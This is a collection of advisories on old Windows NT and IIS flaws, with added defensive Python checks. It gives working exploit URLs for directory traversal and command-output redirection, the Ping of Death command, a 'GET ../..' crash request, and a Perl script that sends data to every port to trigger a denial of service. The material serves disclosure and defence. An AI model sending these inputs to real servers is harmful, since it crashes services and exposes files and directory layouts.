Affected systems: NT 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

---------------------------------------------------------------------

Affected systems: NT 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat', because the '>' is passed through to the command interpreter that runs the batch file and is treated as output redirection.

If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat (the %0A%0D decodes to a line feed and a carriage return) will likewise create an output file 'target.bat'.
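The '..\..' traversal in the first entry and the '>' and %0A%0D redirection tricks in this one are all caught by the same request-path check. The following is an added example, not code from the original page or from IIS: it percent-decodes the path exactly once, treats '\' as '/', refuses any '..' that would climb above the content root, and refuses script names that contain shell metacharacters. The content root /inetpub/wwwroot, the /scripts/ prefix and all function names are assumptions made for the example.

```python
from urllib.parse import unquote

# Hypothetical content root for the example (the real one is whatever the
# server is configured with).
CONTENT_ROOT = "/inetpub/wwwroot"
SCRIPT_DIR = "/scripts/"

# Characters that must never reach a command interpreter through a script
# name.  CR and LF are included because '%0A%0D>PATH\target.bat' smuggles a
# redirection onto a new line once the server percent-decodes it.
SHELL_META = frozenset('<>|&;\r\n')


class BadRequest(Exception):
    """Raised when a request path must be refused."""


def canonical_path(raw_url_path):
    """Decode and normalise a request path; raise if it leaves the root.

    Rules: percent-decode exactly once, treat '\\' as '/' (IIS on NT accepts
    both), then walk the segments with a stack so that a '..' with nothing
    left to pop is an escape attempt rather than something to silently clamp.
    A segment such as 'scripts..' is a plain name on NT (Win32 strips trailing
    dots), not a traversal, so it is pushed like any other name.
    """
    path = unquote(raw_url_path.split('?', 1)[0])
    path = path.replace('\\', '/')
    stack = []
    for seg in path.split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            if not stack:
                raise BadRequest("path escapes content root: %r" % raw_url_path)
            stack.pop()
        else:
            stack.append(seg)
    return '/' + '/'.join(stack)


def safe_script_name(raw_url_path):
    """Return the physical path of a script to run, or raise BadRequest."""
    path = canonical_path(raw_url_path)
    if not path.startswith(SCRIPT_DIR):
        raise BadRequest("not a script request: %r" % path)
    name = path[len(SCRIPT_DIR):]
    bad = SHELL_META.intersection(name)
    if bad:
        raise BadRequest("shell metacharacter(s) in script name: %r" % sorted(bad))
    return CONTENT_ROOT + path


def check(raw_url_path):
    """Return None if the request would be served, else the rejection reason."""
    try:
        path = canonical_path(raw_url_path)
        if path.startswith(SCRIPT_DIR):
            safe_script_name(raw_url_path)
        return None
    except BadRequest as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed requests: the four from the text plus two benign ones.
    for req in ["/..\\..",
                "/scripts..\\..\\scriptname",
                "/scripts/exploit.bat>PATH\\target.bat",
                "/scripts/script_name%0A%0D>PATH\\target.bat",
                "/scripts/hello.bat",
                "/index.html"]:
        print("%-48s %s" % (req, check(req) or "ok -> " + canonical_path(req)))
```

The decision about whether a request is a script request is made on the canonical path, not the raw one: '/scripts..\..\scriptname' normalises to '/scriptname', which is inside the root and is served as an ordinary file rather than executed, while '/..\..' and a percent-encoded '/scripts/%2e%2e/%2e%2e/...' are refused before any filesystem access.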
----------------------------------------------------------------------

Affected systems: NT 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than its usual processor time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings on the NTsecurity@iss.net list to test the ports on your system (Perl is available from the NT Resource Kit):

# --- begin poke code ---
# Uses the standard IO::Socket::INET module in place of the chat2.pl
# library that the original posting required.
use strict;
use warnings;
use IO::Socket::INET;

my $systemname = shift @ARGV or die "usage: perl poke servername\n";

my $verbose    = 1; # tell me what you're hitting
my $knownports = 1; # don't hit known problem ports (53, 135, 1031)

# Start at port 1; port 0 cannot be connected to.
for (my $port = 1; $port < 65535; $port++) {
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    print "Trying port: $port\n" if $verbose;

    # Connect, send about ten characters followed by a <CR>, then disconnect.
    my $fh = IO::Socket::INET->new(PeerAddr => $systemname,
                                   PeerPort => $port,
                                   Proto    => 'tcp',
                                   Timeout  => 2)
        or next;    # nothing listening on this port; move on
    print $fh "This is about ten characters or more\r";
    close $fh;
}
# --- end poke code ---
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: NT 4.0

Using a telnet application to connect to a webserver on HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error. The error occurred on date @ time. The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT)"

(Exception code c0000005 is STATUS_ACCESS_VIOLATION.)

--------------------------------------------------------------------------------
Affected systems: NT 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0x0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
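Why a ping can be "large" at all is worth seeing in numbers: the IP total-length field caps a datagram at 65535 bytes, but the sender fragments the ICMP echo and the receiver only discovers the overflow when it adds the last fragment's offset to its length. The following is an added example, not from the page (constant and function names are mine): it computes the datagram size for the -l 65527 payload quoted above, splits it into fragments the way a sender with a 1500-byte MTU would, and applies the bound a hardened reassembler must check before it allocates or copies.

```python
IP_HEADER = 20            # IPv4 header without options
ICMP_HEADER = 8           # ICMP echo request/reply header
MAX_IP_DATAGRAM = 65535   # 16-bit IP total-length field
MAX_FRAG_OFFSET = 8191    # 13-bit fragment-offset field, in 8-byte units


def icmp_datagram_size(payload_len):
    """Total IP datagram length for an ICMP echo carrying payload_len bytes."""
    return IP_HEADER + ICMP_HEADER + payload_len


def is_ping_of_death(payload_len):
    """True if the echo cannot legally fit in one IPv4 datagram."""
    return icmp_datagram_size(payload_len) > MAX_IP_DATAGRAM


def fragments_for(payload_len, mtu=1500):
    """Fragment an ICMP echo as a sender would for the given link MTU.

    Returns a list of (offset_bytes, data_len, more_fragments).  Every
    fragment but the last carries a multiple of 8 data bytes because the
    offset field counts 8-byte units.  Nothing here stops the last fragment
    from ending past 65535: the sender's arithmetic is per fragment, which
    is exactly why the oversized datagram can be put on the wire.
    """
    ip_payload = ICMP_HEADER + payload_len
    per_frag = (mtu - IP_HEADER) // 8 * 8
    frags, off = [], 0
    while off < ip_payload:
        n = min(per_frag, ip_payload - off)
        if off // 8 > MAX_FRAG_OFFSET:
            raise ValueError("offset %d does not fit the 13-bit field" % off)
        frags.append((off, n, off + n < ip_payload))
        off += n
    return frags


def reassembled_size(frags):
    """Length the receiver would produce: header plus the highest end offset."""
    return IP_HEADER + max(off + n for off, n, _more in frags)


def reassembly_is_safe(frags):
    """The check a reassembler must make before allocating or copying.

    A fixed 64 KiB reassembly buffer is overrun by the last fragment of a
    Ping of Death; refusing the datagram at this point is the fix.
    """
    return reassembled_size(frags) <= MAX_IP_DATAGRAM


if __name__ == "__main__":
    for payload in (65507, 65527):   # 65507 is the largest legal echo payload
        frags = fragments_for(payload)
        print("-l %d: datagram %d bytes, %d fragments, last %r, safe=%s" % (
            payload, icmp_datagram_size(payload), len(frags), frags[-1],
            reassembly_is_safe(frags)))
```

With -l 65527 the datagram is 20 + 8 + 65527 = 65555 bytes, 20 bytes over the limit; the 45th fragment starts at offset 65120 (8140 in the offset field, well inside 13 bits) and its 415 bytes carry the total past 65535, which is the moment an unchecked reassembler writes beyond its buffer.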
--------------------------------------------------------------------------------
Affected systems: IIS up to and including 5.0

Microsoft IIS 5.0 has problems handling a specific form of URL ending in "ida". The problem can have two kinds of result. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other is that the server terminates with an "Access Violation" message, which is effectively a denial of service against the server. All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker requests the malformed URL

http://www.example.com/...[25kb of '.']...ida

the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be made to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an .idq or .ida extension. By requesting a URL such as:

http://www.microsoft.com/anything.ida

or:

http://www.microsoft.com/anything.idq

a remote user will get a response that looks like:

'The IDQ d:\http\anything.idq could not be found'

Such a response lets the attacker learn how the web site is organized and the directory structure of the server.
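The two .ida/.idq entries above describe the same leak: an error message that quotes the physical path of the file the server failed to open. Below is an added example, not from the page, of the check a scanner or reviewer would run over a server's responses: it pulls drive-letter and UNC paths out of the body and, when one ends in the requested name, recovers the physical web root. The regular expression and function names are mine, and the sample responses are constructed here (the first is modelled on the message quoted above).

```python
import re

# A drive-letter path (d:\http\x.idq) or a UNC path (\\server\share\x),
# running until whitespace or a quote.  Pattern written for this example.
WIN_PATH = re.compile(r"(?:[A-Za-z]:\\|\\\\[^\s\\]+\\)[^\s\"'<>]*")


def leaked_paths(body):
    """Every Windows filesystem path that appears in a response body."""
    return sorted(set(m.group(0) for m in WIN_PATH.finditer(body)))


def infer_webroot(leaked, request_path):
    """If a leaked path ends with the requested URL path, return the root.

    Requesting '/anything.idq' and seeing 'd:\\http\\anything.idq' leaked
    means the site's physical root is 'd:\\http'.  The comparison is
    case-insensitive because NTFS names are.
    """
    tail = request_path.replace('/', '\\')
    if leaked.lower().endswith(tail.lower()):
        return leaked[:-len(tail)]
    return None


def audit_response(request_path, body):
    """Summarise what one response gives away about the server's disk layout."""
    paths = leaked_paths(body)
    roots = [r for r in (infer_webroot(p, request_path) for p in paths) if r]
    return {"leaked": paths, "webroot": roots[0] if roots else None}


# Constructed sample responses for three probes: the .idq path leak, the
# long-dots .ida request answered with an error string, and a plain 404.
SAMPLES = [
    ("/anything.idq", "The IDQ d:\\http\\anything.idq could not be found"),
    ("/" + "." * 25000 + "ida", "URL String too long"),
    ("/missing.html", "HTTP Error 404. The page cannot be found."),
]


if __name__ == "__main__":
    for req, body in SAMPLES:
        label = req if len(req) <= 20 else req[:17] + "..."
        print("%-20s %r" % (label, audit_response(req, body)))
```

The useful output is the inferred root rather than the raw path: once an attacker knows the site lives under d:\http, every later traversal or redirection attempt (such as the PATH\target.bat trick earlier on this page) can be aimed at a real location instead of guessed.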